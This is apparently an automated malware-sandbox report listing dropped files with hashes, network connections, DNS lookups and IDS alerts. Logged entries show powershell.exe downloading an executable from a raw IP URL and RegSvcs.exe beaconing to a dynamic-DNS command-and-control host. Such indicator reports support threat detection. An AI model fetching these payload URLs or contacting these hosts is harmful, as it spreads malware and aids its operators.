C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\65f25b9a843df642_0
binary
MD5: e242351413f7f3943b481ac404eaa998
SHA256: 85e99f623539915008089f04c3ccfed38c71c7339a8381ecfec44ee376129824
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000c
compressed
MD5: 737096a391cc2cfbe167a01ba07c9ba2
SHA256: d7741f6d6c163689294530c2f3c9635ce5d26e18b715d14ec2dbe7fcd781db31
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old~RF1af7af.TMP
text
MD5: 80b8c44b60f8bd20d1cf8277ec794bb1
SHA256: 6371157cf7270dd227625ddf799da6c38c60b3e2110fe540b8bc9df48aef09a6
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old
text
MD5: 80b8c44b60f8bd20d1cf8277ec794bb1
SHA256: 6371157cf7270dd227625ddf799da6c38c60b3e2110fe540b8bc9df48aef09a6
4052
mdo.exe
C:\Users\admin\AppData\Local\Temp\88127361\YICNU
text
MD5: 4d184c13b95c0c8d7cf644b9599bfed4
SHA256: 11ab9c4ce531bf94d9ffb7d242a41fae41ccb95e5fc9845c37d315e345b1e2ee
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Last Session
binary
MD5: 02536c23edc1e418a6fea313d20b2a39
SHA256: 8e8de8689482b477d0beebe0a4ac24b9cabcbfa84848f66b4c0f55cd96dc0fe9
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\50da1ec5d44a313d_0
binary
MD5: 6e1025463cc4e1f0e36e09c300298240
SHA256: bed6760d6c656fd245b96ef0fe4a0c30819db4e62d05ae86e449b270de478156
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\3a41e250d088c297_0
binary
MD5: 56df92ea6fe2ba5d7f74664e4de5a736
SHA256: c3e77d83939079d37c5a6cfb45eacb4e733d316c8dd40e2a366452cf835be861
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old~RF1af415.TMP
text
MD5: ea6d75c35eb812fdc5762d84963de026
SHA256: a4e911f2978a45872ede6742468623884a33bca6e015dfb35dd4d55034d9ab74
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old
text
MD5: ea6d75c35eb812fdc5762d84963de026
SHA256: a4e911f2978a45872ede6742468623884a33bca6e015dfb35dd4d55034d9ab74
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
text
MD5: 84042895723ac99f9599edfc7500051c
SHA256: ac49bbf4b490c77bddf11de45ef4965c72b16b00cb2519fdb627363f760c6219
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old~RF1af398.TMP
text
MD5: 84042895723ac99f9599edfc7500051c
SHA256: ac49bbf4b490c77bddf11de45ef4965c72b16b00cb2519fdb627363f760c6219
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\the-real-index
binary
MD5: 7310bf883e828ae9b8e6bd793d45e139
SHA256: 6a17c6592725f64037ee1e3ce5a71ebc0535c92c7ca7ecdca4f055dee0ca6fac
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\the-real-index~RF1af379.TMP
binary
MD5: 7310bf883e828ae9b8e6bd793d45e139
SHA256: 6a17c6592725f64037ee1e3ce5a71ebc0535c92c7ca7ecdca4f055dee0ca6fac
3040
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LBRI7FBWGNFUJXO42060.temp
––
MD5:  ––
SHA256:  ––
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Translate Ranker Model
binary
MD5: 7dc39cf29a2c99cefe62e5171cd7ab58
SHA256: 4ea4ec293a7e8e977e5858afa1ff367a9ed415481f62c16f73c0f5519963b56d
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Translate Ranker Model~RF1af250.TMP
binary
MD5: 7dc39cf29a2c99cefe62e5171cd7ab58
SHA256: 4ea4ec293a7e8e977e5858afa1ff367a9ed415481f62c16f73c0f5519963b56d
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\fabc566d-6696-4897-918e-17844e240c87.tmp
––
MD5:  ––
SHA256:  ––
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old
text
MD5: f727dd25cda7b2cc574098cee1f5764a
SHA256: 5f7bd6926940e400ee7faa6d620192ca299f7b5aaa92d672f8173a767b3fbbff
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old~RF1aee39.TMP
text
MD5: f727dd25cda7b2cc574098cee1f5764a
SHA256: 5f7bd6926940e400ee7faa6d620192ca299f7b5aaa92d672f8173a767b3fbbff
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\CURRENT
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT~RF1aedad.TMP
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\CURRENT~RF1aedad.TMP
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000016.dbtmp
––
MD5:  ––
SHA256:  ––
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000016.dbtmp
––
MD5:  ––
SHA256:  ––
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old
text
MD5: 1aa66efdb743fb0a8dcc1cd79b0b6542
SHA256: 28d56532cced7375a2a1c7731e57c1a1c2ec1ac9827f3e5beee7f8069a5f87dd
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\25177400-1835-41e0-9708-23539467e052.tmp
––
MD5:  ––
SHA256:  ––
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old
text
MD5: 92be6b127e72365885ad4c3fb6534ee2
SHA256: 54302a2573acc775720e7db0ad85873276713302b4f72596a8dcc44b01c70e51
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old
text
MD5: 197882774a7ecec9046bc48f63189b66
SHA256: 27377b0d5f989997c2c3f74acf163eed44b60631ddaa768f6655d7be555742b2
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old~RF1aed11.TMP
text
MD5: 1aa66efdb743fb0a8dcc1cd79b0b6542
SHA256: 28d56532cced7375a2a1c7731e57c1a1c2ec1ac9827f3e5beee7f8069a5f87dd
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF1aed11.TMP
text
MD5: 92be6b127e72365885ad4c3fb6534ee2
SHA256: 54302a2573acc775720e7db0ad85873276713302b4f72596a8dcc44b01c70e51
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old~RF1aed01.TMP
text
MD5: 197882774a7ecec9046bc48f63189b66
SHA256: 27377b0d5f989997c2c3f74acf163eed44b60631ddaa768f6655d7be555742b2
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old
text
MD5: 8ca4ba2b95d7089861a48ed69fde6561
SHA256: aa64c14d0c68b62bbab62a6d6fa4662ff89e1fbc7b337c926ac213c191d6406c
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old~RF1aecd2.TMP
text
MD5: 8ca4ba2b95d7089861a48ed69fde6561
SHA256: aa64c14d0c68b62bbab62a6d6fa4662ff89e1fbc7b337c926ac213c191d6406c
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Version
text
MD5: c10ebd4db49249efc8d112b2920d5f73
SHA256: 90a1b994cafe902f22a88a22c0b6cc9cb5b974bf20f8964406dd7d6c9b8867d1
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
binary
MD5: 9c016064a1f864c8140915d77cf3389a
SHA256: 0e7265d4a8c16223538edd8cd620b8820611c74538e420a88e333be7f62ac787
3400
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
binary
MD5: b59113c2dcd2d346f31a64f231162ada
SHA256: 1d97c69aea85d3b06787458ea47576b192ce5c5db9940e5eaa514ff977ce2dc2
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\swq.xl
text
MD5: bc716dec0a405bd457fdb8aae6f880d4
SHA256: 521008524e25091b703c03e9c2b77388e24f0a1d89bf9c92d6ae453f8409c5b6
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\iwd.docx
text
MD5: 52b5dd8a14c0e8b0c1348f1445c9605f
SHA256: 6dc83bc1f8f7e95296c7b70b68caa85056513f9e079137a843ef0fece00cd294
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\crc.bmp
text
MD5: c68768cbca85c691387a6dd545162283
SHA256: a2426d1643153e335aab55a4c8078e5dc42416142d9890ce9256e38b3ed63106
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\ema.mp4
text
MD5: 19e2227a516dd3c03af3f429ad3cb801
SHA256: 6d7024ebd9a1ed69679795de3fd9cd93d8dc6cb00826822eed818b950ac1a403
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\lph.xl
text
MD5: 602face6e7db59f16cdcf5c62a90fdf4
SHA256: bf42e5064bb8056a92711535f5c332500f7eb8351a6a7b076992e8d416445b83
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\otp.ico
text
MD5: b84743ee3bd9c88c1bf27279e3e1e8cc
SHA256: ca56196b6f06c185cf87311e6e49eb71393a2d3967fb6ce1213a50f122295491
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\agf.mp3
text
MD5: 6b683766e31bf4c09e9606b132a0dcbb
SHA256: e73aef70c5db9d851d906b775e5aabe18888062af3faf53c0ec8cbca5b55e535
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\dnq.mp3
text
MD5: 1770257b1d796e2c229417b1dd44171e
SHA256: 7dc9ca12a862d2f7ec48117148bdb82c53e001db155628de552bb84c033ec40e
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\iwc.txt
text
MD5: c7329353c0cdcdfbfbc625a5121fa4c0
SHA256: 0f6005a715a87630f15de43e21f0e88c1da01b0f7a95b4a9be92fb8c5acc94d8
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\vur.mp4
text
MD5: 20458011d0d339b9d638cd696b112533
SHA256: 771530df8d287e3b3f6c1ef14cfc8d2104cd158a7cf73c3cf12b6ac18565d515
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\uvh.dat
text
MD5: f7d948d24ab00d59fda153ff1c40dad7
SHA256: 4f127ae7c1d45a796718fe442bf3eea86c3ed464a744fe20d2bcd244a843ee80
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\ras.mp3
text
MD5: f6002c65bf5773dbb147aa34813138f3
SHA256: f5fbdc98a578ca4fa9c0c0b9838ebc188ee55efcd5812b2adec14c8bea1281b1
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bkr.dat
text
MD5: 220534e4734ceeaae6bb055b4f0ce3cf
SHA256: 715de9c63dc88fd8f8e8540f067685ed620eff0178e16ae45853c454146287da
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nkd.docx
text
MD5: 2a1f8daf674e9855126c8a9fe1f52f08
SHA256: a5ead5b669f54af308cd26009949e93dddf82721ecee453e7430639bb357f2e9
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\wlx.mp3
text
MD5: 3ef0a39f10a6a648a1776e7a5fd356d1
SHA256: 3c5db10a768ddb3694a65cdd7f662411759a1f1b3f6d33b30030ef2e1826cb29
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bqc.pdf
text
MD5: dcc558713f18bb6f9f1986614670d633
SHA256: bd17ebfdfbbe72298118e4878256d0c306134dae72e24165ac9a9b96c5d7add3
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\ucu.icm
text
MD5: d9b3eb6f6cbab2b8565265147411a2dd
SHA256: 16d9831ec31cc0696835b56cc4d7ff59cdd7f9380b0c12bc09fd8752d4b81223
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\hrp.jpg
text
MD5: 520be58348f83651a6a77d7180c18f1e
SHA256: 81061cb012d827dc6805d6f38e46069478d5ef4062809609ecc64abf8d410a73
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\tlr.txt
text
MD5: 19edfee859fce71ce355d9d7d9f2fae3
SHA256: f719a2229c9929c53a9b10b59a2d1ac20b86758c0d360233e01942fa31e29409
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\qaa.xl
text
MD5: f4712ebb85e9532888e8479a3d71448e
SHA256: 7ceea16b3c8eb2a38ed9e2bbb3462232f84c15dc66d4ab594ca1ff7c4d78954c
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\gbd.ppt
text
MD5: 8ca027526de874041007ebbf4749597b
SHA256: d8e049827a9f7eb38557f48c134bf30893bb798af61878c5a2d9b512fb69022c
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bos.dat
text
MD5: af76971543c4ce9db8caf2e571875f4f
SHA256: fdb64db0910f2ec413da1e4c18c505c2cce72231b1e5ef007605f78a6e5dd1d6
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\kgo.bmp
text
MD5: 4ef0cd3566b0cd7df92dd53b2615190b
SHA256: 86aa28bd8be550be1a2632f5ef119b78bf05efb98cf2316e777be81597c13c04
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\hlk.mp3
text
MD5: 6b00ad93325c0a65afbb84f495edd1a8
SHA256: b079e22683fcd46b416a695a4550b6e06db15bba197179d6120904f90ddadb88
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\jrx.docx
text
MD5: 5744c7f84cdad1fb1027e90e02e33530
SHA256: da8e37eb2f0c1ba7d298a184c8e263ff81d84f5ff5cb4e52541edff939a7ccbe
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nek.mp3
text
MD5: 6d9b924a1abf1d14608bcb066ddfe976
SHA256: fb433941510461f34c27bc1625e9d1a249e59a58132eb7a79ae0acf2bd0bcae7
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nok.pdf
text
MD5: 1db14f74f3914de40c93043a5e0fd2b2
SHA256: 65ddd15ca974d5116f734ad62735fa5d25a298f46653433134ab9b509b3f37ea
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\wqh.ppt
text
MD5: 9c47a245493b6fdb09ebf389cbc97aa9
SHA256: b12245e281dbeb82ea9bd1574634a000ff06e26b14b377f82c820bd9f3af771a
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\tgo.ppt
text
MD5: da7da040fa0aac5f0434873dd878fd9c
SHA256: 57f6780fd5738439d4aa03b8f3aad8ceffaf99a2fb3e20b0e3916298ce09962a
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\sqj.dat
text
MD5: 42c1de8aafab368ba22a4c3504a35c19
SHA256: fca18198a5e5ce7a7438d9a0d5eabf81314f1b13eec4e7ab6b962cdcc60f3bf9
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\wnm.txt
text
MD5: 9d871b45be406860726b7127c3a443cf
SHA256: eb6bd3df86e186d00fdea3207eb712de268e2d8fcef9af8a9e8b73899f89957f
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\jkm.mp3
text
MD5: d764faade38682911bebbe4386b1ced4
SHA256: 27fa4da115127f99de35b1b6d2d241fd2e420ef7b14539bdaba45e33e5e0fdc4
3500
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\warning[1]
image
MD5: 124a9e7b6976f7570134b7034ee28d2b
SHA256: 5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\qtl.docx
text
MD5: eb59a1fe851e768f7bd175cc24217aac
SHA256: 7e30c168edd43afe3e0fb0d21485cf025d5f226d948cb4e56b9f722ba2281365
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\ois.xl
text
MD5: 153b3b542f9cd17247811f7af364a980
SHA256: 7357786d348f08ab1e564efb68cc740e416828252c732721b44bf5f8b9f78303
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\cll.ppt
text
MD5: c3038bb5d678596a20440872bb278380
SHA256: 70dcfc1d30a96aa81ca89c308a379a7458534b6c9cd469c8641e71842c188370
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\jvk.mp3
text
MD5: d9b7cc3f58da6d96c3dbfb4008b26eb9
SHA256: 29f324a7980e633b0052b5bdb634833cd094e5a631380fe6049fc6f6daa7a48c
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nbb.icm
text
MD5: 9b65c9d1111c7e0640ce5900f01dbf05
SHA256: f4b0ae209225a3321acd8b5303b09d8ba245aa4250620d1407356faf82e6f800
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\wmg.mp4
text
MD5: 930e1630892a35d1cbd8a595e972eb0b
SHA256: 958e318f9c7d99abc90e5a98aee4f8af8205dcf542e28ebca2ed8ca6835f7577
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\pou.icm
text
MD5: 53ce9c11f69ede839689a93ea34b9201
SHA256: 3d08042dbb0a693dd4f838236e5d7f5e40f5667ba6b33adcd605f26610817627
3500
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\error[1]
text
MD5: 35fe91c2ac1ba0913cc617622b9eb43f
SHA256: 966240c0527b20e8e2553b7e5a68594ae69230aa00186f2c6c2c342405494837
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\lti.docx
text
MD5: 2571c4827b75254f512f67d569d4969e
SHA256: 72e1bf13d71df21ae55d248b6be66933e371cfc5bc7b0c33f4526f59e8f3f510
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\dss.dat
text
MD5: c488c0eeaa4a77679f10a662945e5e4e
SHA256: db289b5f6cad00bf4b05ed3ba50825ac178119ea0d5f9f58f7a22f1ff670addf
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\urr.docx
text
MD5: 1d37dace5d0be9a4c90b71036ffb43b0
SHA256: 040ed3cba92ec70663baecd5e7f4859776669f4405be70f6db3066bf984d16f4
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
text
MD5: cd28305772bc1d98bf411aa47773a298
SHA256: bb8918982bbb33023b6f11b8d65017ce289dcf508cc566fadcd69f2377da2a47
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bum.pdf
text
MD5: feaeea7208f7a411e4cdc0e3286a11db
SHA256: 1df03709f122f14e2606e94bccb74b47c6c48a483c68a45ed446c06c0ca01965
3500
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\error[1]
html
MD5: 16aa7c3bebf9c1b84c9ee07666e3207f
SHA256: 7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bje.ppt
text
MD5: f77626bd4356a4ae7252eccf68ee9f35
SHA256: 0e385f3f3122f4a5bfa9ddfe1214ef92ead6eea3c834540a88d19f5f23085958
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nkq.docx
text
MD5: 51c9b23e003e3e14f4659bc60d4be131
SHA256: 3adc7f290017eb28aa34e8cec227e781e25d180c3eb77e03b01211369980e0b6
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\seg=muu
text
MD5: 451111d03bca3331e4d1f2631f56c494
SHA256: 98ec9a9a42575a0626ebffaf344487e26118ebca0d837d218cfc4dc446f37102
2704
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\lpr.mp4
text
MD5: 3576b5978b68394d98e25affd7225b83
SHA256: e182a17f5a6b486ff9410ecccbf9685bc5c54cf2ec314ae255040dabce04e895
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\1e063a15-52ef-47f8-b88a-36d8c06054d2.tmp
––
MD5:  ––
SHA256:  ––
3040
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 0586db8ff5249ad980cec7bf2cbc3708
SHA256: df93e043bdfab9e6c36b353985e621a7a276756b52877aacdc5f36517009b4e2
3040
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1add42.TMP
binary
MD5: 0586db8ff5249ad980cec7bf2cbc3708
SHA256: df93e043bdfab9e6c36b353985e621a7a276756b52877aacdc5f36517009b4e2
3440
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF1bb3db.TMP
text
MD5: cd28305772bc1d98bf411aa47773a298
SHA256: bb8918982bbb33023b6f11b8d65017ce289dcf508cc566fadcd69f2377da2a47

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
1
TCP/UDP connections
29
DNS requests
21
Threats
8

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
3040 powershell.exe GET 200 141.136.44.78:80 http://141.136.44.78/jnn/jnn.exe LT
executable
suspicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
3040 powershell.exe 141.136.44.78:80 Vardas.lt, Uab LT suspicious
3440 chrome.exe 216.58.208.35:443 Google Inc. US whitelisted
3440 chrome.exe 216.58.207.67:443 Google Inc. US whitelisted
3440 chrome.exe 172.217.23.131:443 Google Inc. US whitelisted
3440 chrome.exe 172.217.23.170:443 Google Inc. US whitelisted
3440 chrome.exe 172.217.18.13:443 Google Inc. US whitelisted
3440 chrome.exe 216.58.210.4:443 Google Inc. US whitelisted
3440 chrome.exe 216.58.207.35:443 Google Inc. US whitelisted
3440 chrome.exe 172.217.16.131:443 Google Inc. US whitelisted
3092 RegSvcs.exe 8.8.8.8:53 Google Inc. US whitelisted
3440 chrome.exe 216.58.205.234:443 Google Inc. US whitelisted
3092 RegSvcs.exe 8.8.4.4:53 Google Inc. US whitelisted
3440 chrome.exe 216.58.207.46:443 Google Inc. US whitelisted
3440 chrome.exe 172.217.21.195:443 Google Inc. US whitelisted
2920 powershell.exe 141.136.44.78:80 Vardas.lt, Uab LT suspicious
3092 RegSvcs.exe 185.163.45.48:58887 MivoCloud SRL MD suspicious
–– –– 8.8.8.8:53 Google Inc. US whitelisted
–– –– 185.163.45.48:58887 MivoCloud SRL MD suspicious

DNS requests

Domain IP Reputation
www.gstatic.com 216.58.208.35
whitelisted
clientservices.googleapis.com 172.217.23.131
whitelisted
www.google.de 216.58.207.67
whitelisted
safebrowsing.googleapis.com 172.217.23.170
whitelisted
accounts.google.com 172.217.18.13
shared
www.google.com 216.58.210.4
whitelisted
ssl.gstatic.com 216.58.207.35
whitelisted
www.google.lv 172.217.16.131
whitelisted
kgentle777.hopto.org No response unknown
fonts.googleapis.com 216.58.205.234
whitelisted
apis.google.com 216.58.207.46
whitelisted
fonts.gstatic.com 172.217.21.195
whitelisted
kgentle77.duckdns.org 185.163.45.48
malicious

Threats

PID Process Class Message
3040 powershell.exe A Network Trojan was detected ET INFO Executable Download from dotted-quad Host
3040 powershell.exe Potentially Bad Traffic ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
3040 powershell.exe Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
3040 powershell.exe Potentially Bad Traffic ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3040 powershell.exe Potentially Bad Traffic ET INFO SUSPICIOUS Dotted Quad Host MZ Response
3092 RegSvcs.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3092 RegSvcs.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain

Debug output strings

No debug info.